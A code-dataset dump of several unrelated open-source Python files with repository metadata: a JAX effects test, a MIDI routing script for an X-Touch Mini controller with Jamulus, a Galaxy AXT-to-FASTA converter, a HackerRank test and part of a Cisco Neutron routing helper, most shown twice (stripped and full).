def body_fun(x):
effect_p.bind(effect='foo')
return x
return lax.while_loop(cond_fun, body_fun, x)
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f2)(2.)
def test_effects_disallowed_in_scan(self):
def f(x):
def body(carry, x):
effect_p.bind(effect='foo')
return carry, x
return lax.scan(body, x, jnp.arange(4))
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
| 5,524 | 442 | 314 |
7c48d9a6536a3ab26943aaff46659b78907afae2 | 14,748 | py | Python | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
#
# Midi routing layer between jack and jamulus
# For Behringer X-Touch Mini MIDI controller
#
# Layer A: control 8 jamulus channels 0-7 (slider controls ALSA master level)
# Layer B: Control 8 jamulus channels 8-15 (slider controls ALSA capture level)
#
# Rotary encoder has 2 states (push to toggle between states)
# 1. fader (led ring display "fan" pattern, init full volume)
# 2. pan (led ring displays "pan" pattern, init center)
# Top button: "Mute"
# Bottom button: "Solo"
#
# X-Touch mini does not send layer change message.
# this script cannot detect a layer change until an event happens on new layer.
# So it is required to push a button or move an encoder after layer change,
# in order to refresh the encoder led ring state.
#
# Converts momentary pushbuttons and encoder push switches (which send midi note events)
# to toggle pushbuttons (by remembering state),
# and sends LED on/off messages back to midi controller to show state.
# Converts the note events from controller buttons into control events for jamulus.
#
# requires package python3-mididings from jambox-project repo,
# also requires package python-alsaaudio
# sudo apt install python3-mididings python3-alsaaudio
from mididings import *
from mididings.event import *
import alsaaudio
import time
import jack
import sys
import re
master = alsaaudio.Mixer('Master')
capture = alsaaudio.Mixer('Capture')
currentLayer = 0
jamulusChannel = 11
jamulusOutPort = 'out_2'
controllerChannel = 11
controllerGlobalChannel = 1
controllerOutPort = 'out_1'
ledRingSingle = 0
ledRingPan = 1
ledRingFan = 2
ledRingSpread = 3
ledRingTrim = 4
#
# configure mididings with 1 input & 2 output ports:
# - in from midi controller
# - out to midi controller, for setting LEDs etc.
# - out to Jamulus, with processed output (i.e. turn momentary switches into toggles)
#
# use buffered jack backend to minimize impact on audio
#
# automatically connect MIDI ports on startup.
# This script is lanuched in backgound before Jamulus is started
# Need to wait a few seconds before connecting to Jamulus
time.sleep(3)
# Jack has multiple mechanisms for sending alsa MIDI ports to Jack MIDI ports.
# All name the jack ports differently, and we want to work with them all.
# Mididings can use a regexp to look for a matching jack MIDI port
#
target_alias = '^.*X-TOUCH.MINI.*' # regexp allowed
client=jack.Client('mididings')
config(
backend='jack',
client_name='mididings',
in_ports = [
('in', target_alias ),
],
out_ports = [
(controllerOutPort, target_alias ),
(jamulusOutPort, 'Jamulus:input midi')
],
start_delay = 1
)
# there are 48 "buttons" on x-touch mini, on 2 layers (A & B)
# 8 x encoder push switches Layer A: 0-7 Layer B: 24-31
# 8 pushbuttons row 1 Layer A: 8-15 Layer B: 32-39
# 8 pushbuttons row 2 Layer A: 16-23 Layer B: 40-47
# x 2 layers
#
# save a toggle state for each one whether we intend to use it or not
# encoders: 0=fader (ledRing=fan) 1=pan (ledRing=pan)
# pushbuttons: 0=off (led off) 1=on (led on)
#
buttonState = [0] * 48
# Encoders will serve as both fader and pan,
# Encoder push switch will toggle state.
# LED setting of encoder will serve as visual feedback of current encoder state.
# For each encoder, save latest value so it can be restored on state change.
#
# There are 3 values for each encoder:
# encoderState (0=fader, 1=pan)
# faderValue
# panValue
encoderState = [0] * 19 # initialize to "fader" state
faderValue = [127] * 19 # initialize to full volume
panValue = [64] * 19 # initialize to pan center
#
# noteTable is a list of tuples, indexed by the note number 0-47
# the tuples contain:
# ( note, layer, jamulusControlNumber, encoderControlNumber )
#
# note: note number that will toggle state
# layer: 0=Layer A, 1=Layer B
# jamulusControlNumber: Control number to send to Jamulus (for mute & solo buttons)
# encoderControlNumber: Control number in xtouch-mini to send restored encoder value
#
noteTable = [
(0, 0, None, 1), # Layer A encoder push switches
(1, 0, None, 2),
(2, 0, None, 3),
(3, 0, None, 4),
(4, 0, None, 5),
(5, 0, None, 6),
(6, 0, None, 7),
(7, 0, None, 8),
(8, 0, 19, None), # Layer A pushbuttons row 1 (mute 1-8)
(9, 0, 20, None),
(10, 0, 21, None),
(11, 0, 22, None),
(12, 0, 23, None),
(13, 0, 24, None),
(14, 0, 25, None),
(15, 0, 26, None),
(16, 0, 35, None), # Layer A pushbuttons row 2 (solo 1-8)
(17, 0, 36, None),
(18, 0, 37, None),
(19, 0, 38, None),
(20, 0, 39, None),
(21, 0, 40, None),
(22, 0, 41, None),
(23, 0, 42, None),
(24, 1, None, 11), # Layer B encoder push switches
(25, 1, None, 12),
(26, 1, None, 13),
(27, 1, None, 14),
(28, 1, None, 15),
(29, 1, None, 16),
(30, 1, None, 17),
(31, 1, None, 18),
(32, 1, 27, None), # Layer B pushbuttons row 1 (mute 9-16)
(33, 1, 28, None),
(34, 1, 29, None),
(35, 1, 30, None),
(36, 1, 31, None),
(37, 1, 32, None),
(38, 1, 33, None),
(39, 1, 34, None),
(40, 1, 43, None), # Layer B pushbuttons row 2 (solo 9-16)
(41, 1, 44, None),
(42, 1, 45, None),
(43, 1, 46, None),
(44, 1, 47, None),
(45, 1, 48, None),
(46, 1, 49, None),
(47, 1, 50, None)
]
# There are 18 controls on x-touch mini
# 8 encoders Layer A: 1-8 Layer B: 11-18
# 1 slider Layer A: 9 Layer B: 10
# x 2 layers
#
# controlTable is a list of tuples, indexed by the control number 0-18
# the tuples contain:
# (encoderControlNumber, layer, ledRing, controlOutFader, controlOutPan )
#
# encoderControlNumber: Control number in xtouch-mini to receive, also to send restored encoder value
# layer: 0=Layer A, 1=Layer B
# ledRing: Control number to send to xtouch-mini to set led Ring behavior (fan for fader, pan for pan)
# controlOutFader: Control number to send to Jamulus for fader when in fader state
# controlOutPan: Control number to send to Jamulus for pan when in pan state
#
controlTable = [
(0, None, None, None, None), # contol number 0 not used
(1, 0, 1, 1, 51), # layer A encoders 1-8
(2, 0, 2, 2, 52),
(3, 0, 3, 3, 53),
(4, 0, 4, 4, 54),
(5, 0, 5, 5, 55),
(6, 0, 6, 6, 56),
(7, 0, 7, 7, 57),
(8, 0, 8, 8, 58),
(9, 0, None, None, None), # Layer A slider
(10, 1, None, None, None), # Layer B slider
(11, 1, 1, 9, 59), # layer B encoders 9-16
(12, 1, 2, 10, 60),
(13, 1, 3, 11, 61),
(14, 1, 4, 12, 62),
(15, 1, 5, 13, 63),
(16, 1, 6, 14, 64),
(17, 1, 7, 15, 65),
(18, 1, 8, 16, 66)
]
#
# Convert the momentary on/off buttons to toggle events when the button press occurs
# Need to use NOTEOFF events, because X-touch mini
# does not allow setting LED while button is down
#
# Process control value changes.
# Update the stored value, and send to jamulus channel based on the encoder state (fader or pan).
# Sliders are used as alsa controls for Master & Capture, not sent to Jamulus
# X-Touch Mini sends events on midi channel 11.
# use jamulus --ctrlmidich string: "11;f1*16;m19*16;s35*16;p51*16"
# send channel 11 controls 1-18 to Jamulus on port 2 to use for faders (layer A, controls 1-8) and pan (layer b, controls 11-18)
#
# send controls 9 & 10 to alsa for Master and Capture levels
#
# for NOTEOFF events from pushbutton, toggle the button state
# and send back to x-touch mini on port1 to set LED state (convert to a NOTEON event to turn on LED)
# Also send to Jamulus on port 2 as a control event to set mute and solo buttons.
# Use controls above 18 to avoid conflict with physical controls
#
xtouchmini_patch16 = [
ChannelFilter(11) >> [
# Process control changes
CtrlFilter(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18) % Process(controlChange),
# Process button presses on NOTEOFF event
(KeyFilter(0,48) & Filter(NOTEOFF)) % Process(noteOff)
]
]
jamulus_midi = SceneGroup('jamulus_midi', [
Scene('xtouchmini', xtouchmini_patch16, [
[
# Scene initialization events go here
# set to standard mode (not Mackie Control)
Ctrl(controllerOutPort, controllerGlobalChannel, 127, 0),
# set to Layer A
Program(controllerOutPort, controllerGlobalChannel, 1),
# initialize controller encoder values and LED ring states
Process(controllerInit,0)
]
])
])
run(
# control=control,
# pre=preScene,
scenes={
1: jamulus_midi
}
)
| 38.108527 | 128 | 0.62978 | #!/usr/bin/python3
#
# Midi routing layer between jack and jamulus
# For Behringer X-Touch Mini MIDI controller
#
# Layer A: control 8 jamulus channels 0-7 (slider controls ALSA master level)
# Layer B: Control 8 jamulus channels 8-15 (slider controls ALSA capture level)
#
# Rotary encoder has 2 states (push to toggle between states)
# 1. fader (led ring display "fan" pattern, init full volume)
# 2. pan (led ring displays "pan" pattern, init center)
# Top button: "Mute"
# Bottom button: "Solo"
#
# X-Touch mini does not send layer change message.
# this script cannot detect a layer change until an event happens on new layer.
# So it is required to push a button or move an encoder after layer change,
# in order to refresh the encoder led ring state.
#
# Converts momentary pushbuttons and encoder push switches (which send midi note events)
# to toggle pushbuttons (by remembering state),
# and sends LED on/off messages back to midi controller to show state.
# Converts the note events from controller buttons into control events for jamulus.
#
# requires package python3-mididings from jambox-project repo,
# also requires package python-alsaaudio
# sudo apt install python3-mididings python3-alsaaudio
from mididings import *
from mididings.event import *
import alsaaudio
import time
import jack
import sys
import re
master = alsaaudio.Mixer('Master')
capture = alsaaudio.Mixer('Capture')
currentLayer = 0
jamulusChannel = 11
jamulusOutPort = 'out_2'
controllerChannel = 11
controllerGlobalChannel = 1
controllerOutPort = 'out_1'
ledRingSingle = 0
ledRingPan = 1
ledRingFan = 2
ledRingSpread = 3
ledRingTrim = 4
#
# configure mididings with 1 input & 2 output ports:
# - in from midi controller
# - out to midi controller, for setting LEDs etc.
# - out to Jamulus, with processed output (i.e. turn momentary switches into toggles)
#
# use buffered jack backend to minimize impact on audio
#
# automatically connect MIDI ports on startup.
# This script is lanuched in backgound before Jamulus is started
# Need to wait a few seconds before connecting to Jamulus
time.sleep(3)
# Jack has multiple mechanisms for sending alsa MIDI ports to Jack MIDI ports.
# All name the jack ports differently, and we want to work with them all.
# Mididings can use a regexp to look for a matching jack MIDI port
#
target_alias = '^.*X-TOUCH.MINI.*' # regexp allowed
client=jack.Client('mididings')
config(
backend='jack',
client_name='mididings',
in_ports = [
('in', target_alias ),
],
out_ports = [
(controllerOutPort, target_alias ),
(jamulusOutPort, 'Jamulus:input midi')
],
start_delay = 1
)
# there are 48 "buttons" on x-touch mini, on 2 layers (A & B)
# 8 x encoder push switches Layer A: 0-7 Layer B: 24-31
# 8 pushbuttons row 1 Layer A: 8-15 Layer B: 32-39
# 8 pushbuttons row 2 Layer A: 16-23 Layer B: 40-47
# x 2 layers
#
# save a toggle state for each one whether we intend to use it or not
# encoders: 0=fader (ledRing=fan) 1=pan (ledRing=pan)
# pushbuttons: 0=off (led off) 1=on (led on)
#
buttonState = [0] * 48
# Encoders will serve as both fader and pan,
# Encoder push switch will toggle state.
# LED setting of encoder will serve as visual feedback of current encoder state.
# For each encoder, save latest value so it can be restored on state change.
#
# There are 3 values for each encoder:
# encoderState (0=fader, 1=pan)
# faderValue
# panValue
encoderState = [0] * 19 # initialize to "fader" state
faderValue = [127] * 19 # initialize to full volume
panValue = [64] * 19 # initialize to pan center
#
# noteTable is a list of tuples, indexed by the note number 0-47
# the tuples contain:
# ( note, layer, jamulusControlNumber, encoderControlNumber )
#
# note: note number that will toggle state
# layer: 0=Layer A, 1=Layer B
# jamulusControlNumber: Control number to send to Jamulus (for mute & solo buttons)
# encoderControlNumber: Control number in xtouch-mini to send restored encoder value
#
noteTable = [
(0, 0, None, 1), # Layer A encoder push switches
(1, 0, None, 2),
(2, 0, None, 3),
(3, 0, None, 4),
(4, 0, None, 5),
(5, 0, None, 6),
(6, 0, None, 7),
(7, 0, None, 8),
(8, 0, 19, None), # Layer A pushbuttons row 1 (mute 1-8)
(9, 0, 20, None),
(10, 0, 21, None),
(11, 0, 22, None),
(12, 0, 23, None),
(13, 0, 24, None),
(14, 0, 25, None),
(15, 0, 26, None),
(16, 0, 35, None), # Layer A pushbuttons row 2 (solo 1-8)
(17, 0, 36, None),
(18, 0, 37, None),
(19, 0, 38, None),
(20, 0, 39, None),
(21, 0, 40, None),
(22, 0, 41, None),
(23, 0, 42, None),
(24, 1, None, 11), # Layer B encoder push switches
(25, 1, None, 12),
(26, 1, None, 13),
(27, 1, None, 14),
(28, 1, None, 15),
(29, 1, None, 16),
(30, 1, None, 17),
(31, 1, None, 18),
(32, 1, 27, None), # Layer B pushbuttons row 1 (mute 9-16)
(33, 1, 28, None),
(34, 1, 29, None),
(35, 1, 30, None),
(36, 1, 31, None),
(37, 1, 32, None),
(38, 1, 33, None),
(39, 1, 34, None),
(40, 1, 43, None), # Layer B pushbuttons row 2 (solo 9-16)
(41, 1, 44, None),
(42, 1, 45, None),
(43, 1, 46, None),
(44, 1, 47, None),
(45, 1, 48, None),
(46, 1, 49, None),
(47, 1, 50, None)
]
# There are 18 controls on x-touch mini
# 8 encoders Layer A: 1-8 Layer B: 11-18
# 1 slider Layer A: 9 Layer B: 10
# x 2 layers
#
# controlTable is a list of tuples, indexed by the control number 0-18
# the tuples contain:
# (encoderControlNumber, layer, ledRing, controlOutFader, controlOutPan )
#
# encoderControlNumber: Control number in xtouch-mini to receive, also to send restored encoder value
# layer: 0=Layer A, 1=Layer B
# ledRing: Control number to send to xtouch-mini to set led Ring behavior (fan for fader, pan for pan)
# controlOutFader: Control number to send to Jamulus for fader when in fader state
# controlOutPan: Control number to send to Jamulus for pan when in pan state
#
controlTable = [
(0, None, None, None, None), # contol number 0 not used
(1, 0, 1, 1, 51), # layer A encoders 1-8
(2, 0, 2, 2, 52),
(3, 0, 3, 3, 53),
(4, 0, 4, 4, 54),
(5, 0, 5, 5, 55),
(6, 0, 6, 6, 56),
(7, 0, 7, 7, 57),
(8, 0, 8, 8, 58),
(9, 0, None, None, None), # Layer A slider
(10, 1, None, None, None), # Layer B slider
(11, 1, 1, 9, 59), # layer B encoders 9-16
(12, 1, 2, 10, 60),
(13, 1, 3, 11, 61),
(14, 1, 4, 12, 62),
(15, 1, 5, 13, 63),
(16, 1, 6, 14, 64),
(17, 1, 7, 15, 65),
(18, 1, 8, 16, 66)
]
def controllerInit(event,newLayer):
return layerChangeEvents(newLayer) + controllerButtonsRestore()
def controllerButtonsRestore():
# restore controller buttons LED state from buttonState table.
# xtouch mini retains pushbutton LED state across layer changes.
# so this function is only called at startup.
events = []
for note in noteTable:
( noteNumber, layer, jamulusControlNumber, encoderControlNumber ) = note
if jamulusControlNumber is not None:
if buttonState[noteNumber] == 0:
events.append(NoteOffEvent(controllerOutPort, controllerChannel, noteNumber, 0))
else:
events.append(NoteOnEvent(controllerOutPort, controllerChannel, noteNumber, 1))
return events
def layerChangeEvents(newLayer):
# pushbutton switches retain their state across layer changes.
# but encoder LED ring state is not remembered.
#
# Create a list of event to send to xtouch mini, at init time, or when layer change is detected.
# This will set encoder values and ledRings to correct state.
events = []
for control in controlTable:
(encoderControlNumber, layer, ledRing, controlOutFader, controlOutPan) = control
if (layer is not None) and (layer == newLayer) and (ledRing is not None):
# restore state of encoder
ledRing = controlTable[encoderControlNumber][2]
state = encoderState[encoderControlNumber]
if state == 0:
encValue = faderValue[encoderControlNumber]
encLedRing = ledRingFan
else:
encValue = panValue[encoderControlNumber]
encLedRing = ledRingPan
events.append(CtrlEvent(controllerOutPort, controllerChannel, encoderControlNumber, encValue))
events.append(CtrlEvent(controllerOutPort, controllerGlobalChannel, ledRing, encLedRing))
return events
#
# Convert the momentary on/off buttons to toggle events when the button press occurs
# Need to use NOTEOFF events, because X-touch mini
# does not allow setting LED while button is down
#
def noteOff(event):
global currentLayer
events = []
try:
button = event.note
value = event.velocity
# toggle the button state and save it
state = buttonState[button] = 1 if (buttonState[button] == 0) else 0
_, layer, jamulusControlNumber, encoderControlNumber = noteTable[button]
if layer != currentLayer:
events.extend(layerChangeEvents(layer))
currentLayer = layer
if jamulusControlNumber is not None:
# this "note" is a pushbutton switch that gets sent to Jamulus as a control event
# send new LED state back to x-touch mini on same note number,
# send control event to Jamulus on mapped control number
if state == 0:
events.append(NoteOffEvent(controllerOutPort, controllerChannel, event.note, 0))
else:
events.append(NoteOnEvent(controllerOutPort, controllerChannel, event.note, 1))
events.append(CtrlEvent(jamulusOutPort, jamulusChannel, jamulusControlNumber, 0 if state == 0 else 127))
elif encoderControlNumber is not None:
# this "note" is an encoder push switch, not a pushbutton.
# Get the control properties
ledRing = controlTable[encoderControlNumber][2]
# save a copy of the state in encoderState table for lookup by control number
encoderState[encoderControlNumber] = state
if state == 0:
encValue = faderValue[encoderControlNumber]
encLedRing = ledRingFan
else:
encValue = panValue[encoderControlNumber]
encLedRing = ledRingPan
# send new LED Ring state back to x-touch mini as control message on correct number
# send restored encoder value back to x-touch mini as control message on correct number
events.append(CtrlEvent(controllerOutPort, controllerChannel, encoderControlNumber, encValue))
events.append(CtrlEvent(controllerOutPort, controllerGlobalChannel, ledRing, encLedRing))
except Exception as e:
print(e)
return events
# Process control value changes.
# Update the stored value, and send to jamulus channel based on the encoder state (fader or pan).
# Sliders are used as alsa controls for Master & Capture, not sent to Jamulus
def controlChange(event):
global currentLayer
events = []
try:
controlIn = event.ctrl
_, layer, ledRing, controlOutFader, controlOutPan = controlTable[controlIn]
if layer != currentLayer:
events.extend(layerChangeEvents(layer))
currentLayer = layer
if controlIn in (9,10):
# controls 9 and 10 are sliders
# process sliders to control alsa levels, don't send to Jamulus
alsaLevel = event.value * 100 // 127
if controlIn == 9:
master.setvolume(alsaLevel)
elif controlIn == 10:
capture.setvolume(alsaLevel)
else:
encState = encoderState[controlIn]
# update the stored value (fader or pan) based on encState
if encState == 0:
faderValue[controlIn] = event.value
jamulusOutCtrl = controlOutFader
ledRingState = ledRingFan
else:
panValue[controlIn] = event.value
jamulusOutCtrl = controlOutPan
ledRingState = ledRingPan
# send the control value to Jamulus on the correct channel based on encState
events.append(CtrlEvent(jamulusOutPort, jamulusChannel, jamulusOutCtrl, event.value))
# send the ledRing value to controller on the correct channel based on encState
events.append(CtrlEvent(controllerOutPort, controllerGlobalChannel, ledRing, ledRingState))
except Exception as e:
print(e)
return events
# X-Touch Mini sends events on midi channel 11.
# use jamulus --ctrlmidich string: "11;f1*16;m19*16;s35*16;p51*16"
# send channel 11 controls 1-18 to Jamulus on port 2 to use for faders (layer A, controls 1-8) and pan (layer b, controls 11-18)
#
# send controls 9 & 10 to alsa for Master and Capture levels
#
# for NOTEOFF events from pushbutton, toggle the button state
# and send back to x-touch mini on port1 to set LED state (convert to a NOTEON event to turn on LED)
# Also send to Jamulus on port 2 as a control event to set mute and solo buttons.
# Use controls above 18 to avoid conflict with physical controls
#
xtouchmini_patch16 = [
ChannelFilter(11) >> [
# Process control changes
CtrlFilter(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18) % Process(controlChange),
# Process button presses on NOTEOFF event
(KeyFilter(0,48) & Filter(NOTEOFF)) % Process(noteOff)
]
]
jamulus_midi = SceneGroup('jamulus_midi', [
Scene('xtouchmini', xtouchmini_patch16, [
[
# Scene initialization events go here
# set to standard mode (not Mackie Control)
Ctrl(controllerOutPort, controllerGlobalChannel, 127, 0),
# set to Layer A
Program(controllerOutPort, controllerGlobalChannel, 1),
# initialize controller encoder values and LED ring states
Process(controllerInit,0)
]
])
])
run(
# control=control,
# pre=preScene,
scenes={
1: jamulus_midi
}
)
| 5,567 | 0 | 113 |
04625ef97b3d9a70d91769d8ccbc3dd7efc12726 | 1,082 | py | Python | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 2 | 2016-02-23T00:09:14.000Z | 2019-02-11T07:48:44.000Z | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 1 | 2015-02-21T18:48:19.000Z | 2015-02-27T15:50:32.000Z | tools/filters/axt_to_fasta.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 6 | 2015-05-27T13:09:50.000Z | 2019-02-11T07:48:46.000Z | #!/usr/bin/env python
"""
Adapted from bx/scripts/axt_to_fasta.py
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys
import bx.align.axt
# $$$ this should be moved to a bx.align.fasta module
if __name__ == "__main__": main()
| 21.64 | 66 | 0.654344 | #!/usr/bin/env python
"""
Adapted from bx/scripts/axt_to_fasta.py
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys
import bx.align.axt
def usage(s=None):
message = """
axt_to_fasta species1 species2 < axt_file > fasta_file
"""
if (s == None): sys.exit (message)
else: sys.exit ("%s\n%s" % (s,message))
def main():
# check the command line
species1 = sys.argv[1]
species2 = sys.argv[2]
# convert the alignment blocks
reader = bx.align.axt.Reader(sys.stdin,support_ids=True,\
species1=species1,species2=species2)
for a in reader:
if ("id" in a.attributes): id = a.attributes["id"]
else: id = None
print_component_as_fasta(a.components[0],id)
print_component_as_fasta(a.components[1],id)
print
# $$$ this should be moved to a bx.align.fasta module
def print_component_as_fasta(c,id=None):
header = ">%s_%s_%s" % (c.src,c.start,c.start+c.size)
if (id != None): header += " " + id
print header
print c.text
if __name__ == "__main__": main()
| 735 | 0 | 69 |
5b924eaa5c7595b402c7d9e6b8d0304889589068 | 809 | py | Python | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | 4 | 2020-07-24T01:59:50.000Z | 2021-07-24T15:14:08.000Z | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | hackerrank/30 Days of Code/Day 5 - Loops/test.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | import io
import unittest
from contextlib import redirect_stdout
import solution
if __name__ == '__main__':
unittest.main()
| 28.892857 | 46 | 0.363412 | import io
import unittest
from contextlib import redirect_stdout
import solution
class TestQ(unittest.TestCase):
def test_case_0(self):
text_trap = io.StringIO()
with redirect_stdout(text_trap):
solution.main(2)
self.assertEqual(text_trap.getvalue(),
'2 x 1 = 2' + '\n' +
'2 x 2 = 4' + '\n' +
'2 x 3 = 6' + '\n' +
'2 x 4 = 8' + '\n' +
'2 x 5 = 10' + '\n' +
'2 x 6 = 12' + '\n' +
'2 x 7 = 14' + '\n' +
'2 x 8 = 16' + '\n' +
'2 x 9 = 18' + '\n' +
'2 x 10 = 20' + '\n')
if __name__ == '__main__':
unittest.main()
| 618 | 10 | 49 |
92f341927ed4dd0d4741361b5318c57e665127b7 | 52,243 | py | Python | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | networking_cisco/plugins/cisco/cfg_agent/service_helpers/routing_svc_helper.py | Gitweijie/first_project | e27ec5a03b20022a66c994c0ee89ef7023cc5c29 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import eventlet
import netaddr
import pprint as pp
from operator import itemgetter
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron_lib import exceptions as n_lib_exc
from networking_cisco._i18n import _, _LE, _LI, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.cfg_agent import cfg_exceptions
from networking_cisco.plugins.cisco.cfg_agent.device_drivers import driver_mgr
from networking_cisco.plugins.cisco.cfg_agent import device_status
from networking_cisco.plugins.cisco.common import (cisco_constants as
c_constants)
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
ncc_errors = importutils.try_import('ncclient.transport.errors')
LOG = logging.getLogger(__name__)
N_ROUTER_PREFIX = 'nrouter-'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
# Number of routers to fetch from server at a time on resync.
# Needed to reduce load on server side and to speed up resync on agent side.
SYNC_ROUTERS_MAX_CHUNK_SIZE = 64
SYNC_ROUTERS_MIN_CHUNK_SIZE = 8
class RouterInfo(object):
"""Wrapper class around the (neutron) router dictionary.
Information about the neutron router is exchanged as a python dictionary
between plugin and config agent. RouterInfo is a wrapper around that dict,
with attributes for common parameters. These attributes keep the state
of the current router configuration, and are used for detecting router
state changes when an updated router dict is received.
This is a modified version of the RouterInfo class defined in the
(reference) l3-agent implementation, for use with cisco config agent.
"""
@property
@property
@property
@router.setter
@property
class CiscoRoutingPluginApi(object):
"""RoutingServiceHelper(Agent) side of the routing RPC API."""
def get_routers(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve the sync data for routers.
:param context: session context
:param router_ids: list of routers to fetch
:param hd_ids : hosting device ids, only routers assigned to these
hosting devices will be returned.
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'cfg_sync_routers', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_router_ids(self, context, router_ids=None, hd_ids=None):
"""Make a remote process call to retrieve scheduled routers ids."""
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_cfg_router_ids', host=self.host,
router_ids=router_ids, hosting_device_ids=hd_ids)
def get_hardware_router_type_id(self, context):
"""Get the ID for the ASR1k hardware router type."""
cctxt = self.client.prepare()
return cctxt.call(context,
'get_hardware_router_type_id',
host=self.host)
def update_floatingip_statuses(self, context, router_id, fip_statuses):
"""Make a remote process call to update operational status for one or
several floating IPs.
@param context: contains user information
@param router_id: id of router associated with the floatingips
@param fip_statuses: dict with floatingip_id as key and status as value
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_floatingip_statuses_cfg',
router_id=router_id, fip_statuses=fip_statuses)
def send_update_port_statuses(self, context, port_ids, status):
"""Call the pluging to update the port status which updates the DB.
:param context: contains user information
:param port_ids: list of ids of the ports associated with the status
:param status: value of the status for the given port list (port_ids)
"""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_port_statuses_cfg',
port_ids=port_ids, status=status)
| 45.271231 | 79 | 0.604866 | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import eventlet
import netaddr
import pprint as pp
from operator import itemgetter
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from oslo_utils import importutils
import six
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron_lib import exceptions as n_lib_exc
from networking_cisco._i18n import _, _LE, _LI, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.cfg_agent import cfg_exceptions
from networking_cisco.plugins.cisco.cfg_agent.device_drivers import driver_mgr
from networking_cisco.plugins.cisco.cfg_agent import device_status
from networking_cisco.plugins.cisco.common import (cisco_constants as
c_constants)
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
ncc_errors = importutils.try_import('ncclient.transport.errors')
LOG = logging.getLogger(__name__)
N_ROUTER_PREFIX = 'nrouter-'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
# Number of routers to fetch from server at a time on resync.
# Needed to reduce load on server side and to speed up resync on agent side.
SYNC_ROUTERS_MAX_CHUNK_SIZE = 64
SYNC_ROUTERS_MIN_CHUNK_SIZE = 8
class IPAddressMissingException(n_lib_exc.NeutronException):
message = _("Router port %(port_id)s has no IP address on subnet "
"%(subnet_id)s.")
class MultipleIPv4SubnetsException(n_lib_exc.NeutronException):
message = _("There should not be multiple IPv4 subnets %(subnets)s on "
"router port %(port_id)s")
class RouterInfo(object):
"""Wrapper class around the (neutron) router dictionary.
Information about the neutron router is exchanged as a python dictionary
between plugin and config agent. RouterInfo is a wrapper around that dict,
with attributes for common parameters. These attributes keep the state
of the current router configuration, and are used for detecting router
state changes when an updated router dict is received.
This is a modified version of the RouterInfo class defined in the
